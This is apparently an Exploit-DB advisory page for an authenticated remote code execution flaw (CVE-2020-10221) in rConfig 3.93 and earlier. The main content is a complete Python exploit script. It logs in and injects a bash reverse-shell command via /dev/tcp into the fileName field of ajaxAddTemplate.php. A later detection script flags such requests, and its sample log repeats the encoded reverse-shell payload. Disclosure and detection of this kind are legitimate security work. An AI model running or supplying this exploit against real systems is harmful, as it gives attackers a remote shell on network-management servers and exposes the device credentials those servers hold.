Vendor: rConfig
By: Engin Demirbilek
CVSS: 8.8 (HIGH)
Authenticated Remote Code Execution
CWE: 78
Product Name: rConfig
Affected Version From: rConfig <= 3.94
Affected Version To: rConfig <= 3.94
Patch Exists: YES
Related CWE: CVE-2020-10221
CPE: a:rconfig:rconfig
Other Scripts: N/A
Platforms Tested: centOS
2020

rConfig 3.93 – ‘ajaxAddTemplate.php’ Authenticated Remote Code Execution

An authenticated remote code execution vulnerability exists in rConfig 3.93 and below. An authenticated attacker can exploit it by sending a malicious payload to ajaxAddTemplate.php, which lets the attacker execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to rConfig 3.94 or later.

Exploit-DB raw data:

# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
# Date: 2020-03-08
# Exploit Author: Engin Demirbilek
# Vendor Homepage: https://www.rconfig.com/
# Version: rConfig <= 3.94
# Tested on: centOS
# CVE: CVE-2020-10221
# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce

import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
	print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
	exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])

login = {
	'user':user,
	'pass':password,
	'sublogin':'1'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)

payload = {
	'fileName':payload,
}



print "[+] Sendin exploit ..."

exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'},verify=False)

if exploit.status_code == 200:
	print "[+] Everything seems ok, check your listener."
else:
	print "[-] Exploit failed,  system is patched or credentials are wrong."
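
A detection check for the request the script above sends, added here as an example and not part of the original advisory or of rConfig: it flags POSTs to ajaxAddTemplate.php whose fileName value is not a plain file name. The allowlist pattern, the record layout and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and POST parameter taken from the script above.
TARGET_PATH = "/lib/ajaxHandlers/ajaxAddTemplate.php"
TARGET_PARAM = "fileName"
# Assumption: a legitimate template name is a plain file name.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")

# Constructed sample records (documentation IP ranges), in the shape a
# reverse proxy or WAF audit log with body capture might provide.
# The third record has a doubled slash on purpose.
SAMPLE = [
    {"src": "203.0.113.5", "method": "POST", "url": "/lib/crud/userprocess.php",
     "body": "user=admin&pass=REDACTED&sublogin=1"},
    {"src": "203.0.113.5", "method": "POST", "url": TARGET_PATH,
     "body": "fileName=branch-router-template"},
    {"src": "198.51.100.7", "method": "POST", "url": "/rconfig/" + TARGET_PATH,
     "body": "fileName=%3Bbash+-i+%3E%26+%2Fdev%2Ftcp%2F192.0.2.10%2F4444+0%3E%261%3B"},
    {"src": "198.51.100.7", "method": "GET", "url": "/dashboard.php", "body": ""},
]


def unsafe_filenames(method, url, body):
    """Return decoded fileName values in one request that fail the allowlist."""
    # Collapse repeated slashes so "//lib//ajaxHandlers/..." still matches.
    path = re.sub(r"/+", "/", urlsplit(url).path)
    if method.upper() != "POST" or not path.endswith(TARGET_PATH):
        return []
    # parse_qs URL-decodes values, so %3B is compared as ";".
    params = parse_qs(body, keep_blank_values=True)
    return [v for v in params.get(TARGET_PARAM, []) if not SAFE_NAME.fullmatch(v)]


def scan(records):
    """Return (source address, offending value) for every flagged request."""
    return [(r["src"], v) for r in records
            for v in unsafe_filenames(r["method"], r["url"], r["body"])]


if __name__ == "__main__":
    for src, value in scan(SAMPLE):
        print(f"ALERT {src} sent {TARGET_PARAM}={value!r} to {TARGET_PATH}")
```

The same allowlist applied server-side to fileName before it reaches any shell command is the input-validation counterpart of this check; upgrading as stated under Mitigation remains the fix.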